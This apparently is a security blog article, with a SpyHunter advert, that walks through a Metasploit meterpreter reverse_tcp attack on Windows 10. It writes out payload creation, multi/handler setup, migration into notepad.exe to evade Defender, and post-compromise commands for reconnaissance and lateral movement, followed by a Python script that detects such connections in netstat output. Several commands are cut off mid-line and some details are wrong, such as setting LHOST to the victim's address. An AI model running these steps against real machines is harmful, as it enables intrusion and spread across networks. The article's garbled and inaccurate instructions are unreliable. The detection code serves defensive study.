| Short Description | Read and write permissions in Windows 10. Allows the attacker to infect other PCs connected to the infected one. |
| Symptoms | Appearance of an unfamiliar .exe file. |
| Distribution Method | Spam mails, MiTM attacks, malicious redirects. |
| Detection tool | Download SpyHunter to see if your system has been affected by Trojan:Win32/Swrort |
A dangerous exploit has been discovered in Windows 10, using a Trojan:Win32/Swrort to bypass Windows Defender and gain read and write permissions. An anonymous researcher demonstrated the vulnerability on a channel called Metasploitstation. He shows three phases in which you can slip past Windows 10 defenses. So far no information has been found on whether this exploit has been fixed or not.
Windows 10 Multihandler Exploit Infection – How To Do It?
In the video, the tech-savvy user demonstrated a simulation with a '123.exe' file, which he creates and executes as if it had been opened in the real world as an email attachment or run by some other method. We have divided the infection process into three phases to help you better understand the methodology.
Phase 1: File Preparation
The hacker creates a payload with this configuration in a Linux environment:
→msfpayload windows/meterpreter/reverse_tcp LHOST=
portnumber1* – This is the port used for the attack. It can be any port (4444, 4324, etc.). We have written portnumber1 because he also uses a second port number, which we named
After this phase is complete and the file created by the attacker has been dropped onto the user's system, the attacker may proceed to Phase 2.
Phase 2: Using the exploit.
At this point, the attacker uses the multi/handler module to listen for the connection from the .exe and take advantage of the exploit to open an active session (a connection) to the victim PC.
This is done with the following commands:
→msfconsole (starts the console and opens the 'msf>' prompt)
In ‘msf’ the attacker can execute the following commands:
set lhost ‘victim IP address’
set lport ‘portnumber1’
After that, the attacker executes the payload to establish a session:
→msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
To check whether an active session is possible, the attacker runs the command 'msf exploit(handler) > show options', which shows the following:
→EXITFUNC  process            yes  Exit technique (accepted: seh, thread, ...)
LHOST     victim IP address  yes  The listen address
LPORT     portnumber1        yes  The listen port
This lets him confirm that the settings are configured correctly, and he may proceed with the actual infection of the computer.
Phase 3: Infection
The command the attacker uses to initiate an active session with the victim is 'exploit'. After this command was executed and the file '123.exe' ran, the handler replied with:
→[*] Started reverse handler on
[*] Starting the payload handler…
At this point, the executable was started on the Windows machine. Even though Windows Defender was running, it did not stop the attack. However, when a virus scan was run, the Windows antivirus program immediately detected '123.exe' as Trojan:Win32/Swrort.A.
To avoid detection, the attacker used a tactic called migrating, which created a 'notepad.exe' file and migrated the active session from '123.exe' to this file upon connecting. This was done using the command:
After migrating the process and repeating the same simulation but using
From there, the attacker demonstrated full read and write permissions by creating a new folder containing a new text document. As far as we know, the main commands that may be used after connection are:
→>sysinfo – shows the system version and information.
>shell – shows the Windows version and other information.
>getuid – shows the Windows ID.
>ps -aux – displays all .exe files running in the Windows Task Manager.
>ifconfig – displays information about the interfaces (IP addresses and other details). This command gives the attacker what he needs to connect to another computer on the same network segment (NIC and VLAN) as the infected PC. This can be devastating for home or office networks if such an attack is well organized.
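The defensive flip side of the migration trick and the arbitrary handler port is that both leave a trace on the victim: a process that normally never talks to the network ('notepad.exe') holds an established outbound TCP connection, and the remote port is one an administrator would not expect. The following is an added example written for this article, not code from the video or from Metasploit: a small Python script that parses constructed 'netstat -ano' output together with a constructed PID-to-image map (as 'tasklist' would give) and flags connections that match either pattern. The sample output, the process names, the list of programs that should never be network clients and the set of suspicious ports are all assumptions made for the example.

```python
import re
from collections import namedtuple

# Constructed sample of Windows `netstat -ano` output (not captured from the page).
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    192.168.1.20:49712     192.168.1.10:4444      ESTABLISHED     4128
  TCP    192.168.1.20:49720     93.184.216.34:443      ESTABLISHED     2204
  TCP    192.168.1.20:49733     192.168.1.10:4324      ESTABLISHED     3560
  UDP    0.0.0.0:5353           *:*                                    1544
"""

# Constructed PID -> image name map, as `tasklist` would report it (assumption).
TASKLIST_SAMPLE = {912: "svchost.exe", 4128: "123.exe", 2204: "msedge.exe",
                   3560: "notepad.exe", 1544: "svchost.exe"}

# Programs that have no legitimate reason to hold an outbound TCP session (assumed baseline).
NO_NETWORK_EXPECTED = {"notepad.exe", "calc.exe", "mspaint.exe", "wordpad.exe"}

# Remote ports the article mentions as handler ports; treated as suspicious here (assumption).
SUSPICIOUS_REMOTE_PORTS = {4444, 4324}

Conn = namedtuple("Conn", "proto local remote state pid")

# One netstat row: proto, local addr, foreign addr, optional state, PID.
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:(\S+)\s+)?(\d+)\s*$")


def parse_netstat(text):
    """Turn raw `netstat -ano` text into Conn records, skipping the header."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, local, remote, state, pid = m.groups()
        conns.append(Conn(proto, local, remote, state or "", int(pid)))
    return conns


def remote_port(addr):
    """Extract the port from 'host:port' (works for '[::1]:443' as well)."""
    _, _, port = addr.rpartition(":")
    return int(port) if port.isdigit() else None


def find_suspicious(conns, images):
    """Flag established TCP sessions held by unexpected clients or to suspicious ports."""
    findings = []
    for c in conns:
        if c.proto != "TCP" or c.state != "ESTABLISHED":
            continue
        image = images.get(c.pid, "<unknown>").lower()
        reasons = []
        if image in NO_NETWORK_EXPECTED:
            reasons.append("unexpected network client")
        if remote_port(c.remote) in SUSPICIOUS_REMOTE_PORTS:
            reasons.append("remote port matches common handler port")
        if reasons:
            findings.append({"pid": c.pid, "image": image, "remote": c.remote,
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(parse_netstat(NETSTAT_SAMPLE), TASKLIST_SAMPLE):
        print(f"PID {f['pid']} ({f['image']}) -> {f['remote']}: {', '.join(f['reasons'])}")
```

In the constructed sample the browser session to port 443 passes, while '123.exe' is flagged for its handler-port connection and the migrated 'notepad.exe' session is flagged on both counts. On a real host the same logic runs over the actual 'netstat -ano' and 'tasklist' output, with the baseline sets adjusted to the environment.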
Windows 10 Exploits – Conclusion
There is no confirmed information on whether this exploit has been fixed, but, as with any other software, more may yet be uncovered. If you are using Windows 10, we therefore recommend downloading and installing an advanced anti-malware program. It will actively protect you and update itself regularly against the latest threats. Such programs also have active shields that immediately detect unauthorized connections.